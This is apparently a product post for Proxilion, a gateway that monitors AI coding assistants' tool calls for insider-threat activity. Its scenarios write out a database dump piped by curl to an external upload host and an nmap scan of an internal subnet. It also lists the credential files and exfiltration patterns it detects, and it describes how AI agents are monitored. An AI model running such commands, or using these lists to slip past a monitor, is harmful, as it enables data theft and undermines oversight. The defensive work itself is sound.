Preventing Insider Threats in AI Coding Assistants

On November 13, 2025, Anthropic published a report documenting the first large-scale AI-orchestrated cyber espionage campaign (GTG-1002). The attackers used Claude Code with 80-90% autonomy to discover vulnerabilities, generate exploits, harvest credentials, and exfiltrate data.

The attackers controlled their own infrastructure. They weren't exploiting victims' AI tools.

The Real Threat

The actual risk for organizations isn't external attackers using AI. It's insiders weaponizing the AI tools you've already deployed:

  • Disgruntled employee uses Claude Code to exfiltrate the customer database
  • Compromised account uses GitHub Copilot to scan internal networks and harvest SSH keys
  • Rogue AI agent exceeds its scope and accesses production credentials

Organizations deploy Claude Code, Copilot, and Cursor to thousands of employees, often with no security monitoring of what those tools actually execute.

What Proxilion Does

Proxilion sits between AI coding assistants and their tool execution layer. Every bash command, file access, or API call goes through real-time threat analysis before execution.

Why Rust?

The gateway processes thousands of requests per second with <50ms P95 latency:

  • Memory safety: Buffer overflows and use-after-free bugs, the kind of flaws that would turn the gateway itself into an attack vector, are ruled out at compile time.
  • Zero-cost abstractions: Pattern matching compiles down to efficient branches, and regexes are compiled once at startup rather than on every request.
  • Fearless concurrency: The compiler enforces thread-safe access to shared session state, catching data races at build time.
  • No garbage collection: Predictable latency under load.
  • Single binary deployment: No dependencies, no runtime. Build once, deploy anywhere.

Why MCP Layer?

Model Context Protocol (MCP) is where AI tools execute actions:

  • Universal coverage: Works with Claude Code, Cursor, Windsurf, any MCP-compatible tool
  • Pre-execution analysis: We see commands before they run, not after damage is done
  • Full context: Tool calls include conversation history for social engineering detection
  • Low latency: HTTP interceptor adds <50ms
  • No AI modification: Drop-in proxy, no changes to Claude or other AI models
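
Concretely, being a drop-in proxy means the MCP client is pointed at the gateway instead of at the tool server directly. A rough sketch (the exact format depends on the MCP client, and the server name, hostname, and port here are placeholders, not the project's actual values):

```json
{
  "mcpServers": {
    "internal-tools": {
      "url": "https://proxilion.internal:8443/mcp"
    }
  }
}
```

The gateway forwards approved tool calls upstream unchanged, so neither the AI model nor the tool server needs modification.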

Detection Coverage

High-confidence detection (90-100%):

  • Network reconnaissance (nmap, masscan, service enumeration)
  • Credential file access (SSH keys, .env files, cloud credentials)
  • Hacking tools (sqlmap, metasploit, burpsuite)
  • Privilege escalation (sudo abuse, setuid manipulation, IAM role changes)

Medium-confidence detection (70-90%):

  • Data exfiltration (curl to pastebin, large transfers to external IPs)
  • Multi-phase kill chains (reconnaissance → access → exfiltration over hours)
  • Social engineering (conversation analysis, pretexting, authority manipulation)
  • Lateral movement (SSH/RDP across internal networks, port scanning)

Detection limitations (30-70%):

  • Novel attack techniques not in our pattern database
  • Highly fragmented attacks (50+ micro-requests over weeks)
  • Attacks specifically designed to evade pattern detection
  • Zero-day exploits with no behavioral indicators

Overall detection rate: 75-85% against sophisticated attacks like GTG-1002.

This is one layer in defense-in-depth, not a silver bullet.

Detection Engine

25 specialized analyzers running in parallel:

Pattern-Based (18 analyzers):

  • Enumeration: nmap, masscan, port scans, service discovery
  • Credential Access: SSH keys, .env, .aws/credentials, cloud configs
  • Exfiltration: URL analysis for pastebin, suspicious IPs, large POST bodies
  • Hacking Tools: sqlmap, metasploit, burpsuite, nikto
  • Privilege Escalation: sudo abuse, setuid binaries, IAM policy changes
  • Lateral Movement: SSH/RDP connections, network pivoting
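
A pattern-based analyzer reduces to matching a command against indicator patterns and returning a score. A minimal Python sketch of the idea (the gateway itself is Rust; the patterns and scores below are illustrative, and real analyzers would use compiled regexes rather than substring checks):

```python
# Illustrative indicator patterns for the credential-access analyzer.
# Patterns and scores are examples, not Proxilion's actual rule set.
CREDENTIAL_PATTERNS = {
    ".ssh/id_rsa": 90,
    ".aws/credentials": 85,
    ".env": 70,
}

def credential_access_score(command: str) -> int:
    """Return the highest-scoring indicator found in the command, 0 if none."""
    return max(
        (score for pattern, score in CREDENTIAL_PATTERNS.items()
         if pattern in command),
        default=0,
    )
```

Each of the 18 pattern analyzers follows this shape with its own indicator set, which is why they can run in parallel with low latency.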

Session-Aware (4 analyzers):

  • Session Progression: Kill chain tracking (recon → access → exfil)
  • Request Rate: Burst detection, machine timing vs. human timing
  • AI Velocity: Autonomous agent detection, acceleration patterns
  • Task Fragmentation: Multi-request attacks spread across time
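
The request-rate analyzer's core idea, separating machine-paced bursts from human pacing, can be sketched as an inter-request gap check (window size and threshold are illustrative, not Proxilion's tuned values):

```python
def looks_machine_paced(timestamps, threshold_s=0.5, window=5):
    """Flag a burst if `window` consecutive requests each arrive within
    `threshold_s` seconds of the previous one. Humans rarely sustain
    sub-second pacing; autonomous agents routinely do."""
    if len(timestamps) < window:
        return False
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    run = 0
    for gap in gaps:
        run = run + 1 if gap < threshold_s else 0
        if run >= window - 1:
            return True
    return False
```

The AI-velocity analyzer extends the same signal with acceleration over time rather than a fixed window.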

Semantic Analysis (3 analyzers) - Optional, requires Claude API:

  • Conversation Analysis: Social engineering detection
  • Prompt Engineering: Jailbreak attempt detection
  • Intent Clarification: Ambiguous command analysis

Scoring: Each analyzer returns a score from 0 to 100. The composite score is a weighted average across all analyzers.

  • 0-49: Allow (audit log only)
  • 50-69: Alert (notify security team, allow execution)
  • 70-89: Block (prevent this specific command)
  • 90-100: Terminate (kill entire session, disable user)
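
The scoring pipeline above can be sketched in a few lines of Python (the gateway itself is Rust; the weights in the example are illustrative):

```python
def composite_score(analyzer_scores):
    """Weighted average over (score, weight) pairs, one per analyzer."""
    total_weight = sum(w for _, w in analyzer_scores)
    if total_weight == 0:
        return 0
    return round(sum(s * w for s, w in analyzer_scores) / total_weight)

def action_for(score):
    """Map a composite score onto the four response tiers."""
    if score >= 90:
        return "terminate"
    if score >= 70:
        return "block"
    if score >= 50:
        return "alert"
    return "allow"
```

For example, one analyzer scoring 85 with weight 3 and another scoring 40 with weight 1 yields a composite of 74, which lands in the block tier.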

Session State Tracking

Redis tracks session history across hours and days for kill chain detection:

Monday 10:00 AM: nmap scan (score: 85, BLOCKED)
Monday 2:30 PM: cat .env (score: 70, BLOCKED)
Monday 6:45 PM: curl pastebin (score: 65, ALERT)

Session Progression: 3 phases detected across 9 hours
Composite Score: 96 (TERMINATE SESSION)

Individual requests might score below blocking threshold, but multi-phase progression triggers termination.
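
One way to sketch that escalation logic in Python (phase names and the per-phase bonus are illustrative, not Proxilion's actual weighting):

```python
# Illustrative kill-chain escalation: the session score starts from the
# highest single-request score and climbs with each additional distinct
# phase observed, so a full recon -> access -> exfil chain can cross the
# terminate threshold even if no single request did.
KILL_CHAIN = ("recon", "access", "exfiltration")

def session_score(events):
    """events: list of (phase, score) tuples accumulated over the session."""
    if not events:
        return 0
    phases = {p for p, _ in events if p in KILL_CHAIN}
    peak = max(s for _, s in events)
    bonus = 10 * (len(phases) - 1) if phases else 0
    return min(100, peak + bonus)
```

A single blocked nmap scan stays at its own score, but the same scan followed hours later by credential access and an upload pushes the session into terminate territory.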

Performance

Latency (measured under load):

  • Pattern analysis: 5-15ms P95
  • Session state lookup: 2-5ms P95 (Redis)
  • Semantic analysis: 200-500ms P95 (Claude API, optional)
  • Total: <50ms P95 without semantic

Throughput:

  • Single instance: 10,000+ requests/second
  • Horizontal scaling: Linear (stateless design)
  • Redis bottleneck: ~100,000 requests/second per cluster

Deployment

Self-hosted only. This is not a SaaS product.

Security teams will not send internal tool execution logs to third-party APIs. Every command contains proprietary information (internal IPs, database names, employee IDs, project codenames).

We provide:

  • Docker Compose for single-server deployment (10-100 users)
  • Kubernetes manifests for HA deployment (100-10,000 users)
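
For the single-server case, a compose file along these lines wires the gateway to its Redis session store (image names, ports, and environment variables below are placeholders, not the project's actual configuration):

```yaml
services:
  proxilion:
    image: proxilion/gateway:latest   # placeholder image name
    ports:
      - "8443:8443"                   # MCP interceptor endpoint
    environment:
      REDIS_URL: redis://redis:6379
      SEMANTIC_ANALYSIS: "off"        # pattern-based detection only
    depends_on:
      - redis
  redis:
    image: redis:7-alpine
```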

Data never leaves your infrastructure. Source code is auditable. Modify analyzers for your threat model.

Real-World Scenarios

Scenario 1: Database Exfiltration Prevented

Employee gives notice on Friday. Monday morning:

# Employee to Claude Code: "Help me back up the customer database for documentation"
pg_dump production_db | gzip | curl -F "file=@-" https://personal-s3-bucket

Proxilion Analysis:

  • Database dump tool detected (score: 75)
  • Compression before transfer (score: +10)
  • External upload destination (score: +15)
  • Composite score: 100 - TERMINATE

Session killed. Security team alerted. Employee account disabled.

Scenario 2: Compromised Account Contained

Attacker gains access to developer's Claude Code session via phishing:

# Attacker via AI: "Scan the internal network to understand the infrastructure"
nmap -sV 10.0.0.0/24 -p 22,80,443,3306,5432

Proxilion Analysis:

  • Hacking tool detected: nmap (score: 80)
  • Internal network target (score: +5)
  • Multi-port scanning (score: +3)
  • Composite score: 88 - BLOCK

Command blocked. Reconnaissance prevented. Breach contained before lateral movement.

Scenario 3: Legitimate Admin Work Allowed

DevOps engineer during incident response:

# Engineer to Claude: "Check if SSH is running on the backup server"
ssh user@backup-server.internal systemctl status sshd

Proxilion Analysis:

  • SSH connection to internal server (score: 45)
  • systemctl command (legitimate admin) (score: +5)
  • Conversation context: "incident response" (legitimacy: -10)
  • Composite score: 40 - ALLOW

No false positive. Legitimate work allowed.

Cost Analysis

Infrastructure (100 developers):

  • Self-hosted: $200/month (2x t3.medium + Redis cluster)
  • Managed cloud: $500/month (ECS Fargate + ElastiCache)

Semantic analysis (optional):

  • With prompt caching: $50/month (1,000 requests/day, 62% cost reduction)
  • Without prompt caching: $130/month
  • Disabled: $0 (pattern-based detection only)

Total: $250-650/month for 100 developers

Value: Preventing a single $50M data breach = 600,000% ROI

Why Now

GTG-1002 showed what AI can do when weaponized. That capability now exists inside every organization deploying AI coding assistants to employees.

The question is not "could an insider weaponize AI tools?" The answer is yes.

The question is "do you have visibility and controls when it happens?"

Right now, for most organizations, the answer is no.

Get Started on GitHub